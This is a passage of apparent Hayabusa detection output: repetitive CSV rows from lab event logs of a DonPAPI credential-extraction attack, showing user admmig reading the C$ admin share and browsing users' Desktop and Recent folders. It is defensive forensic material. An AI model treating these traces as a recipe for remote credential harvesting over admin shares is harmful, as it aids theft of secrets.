0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.848 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 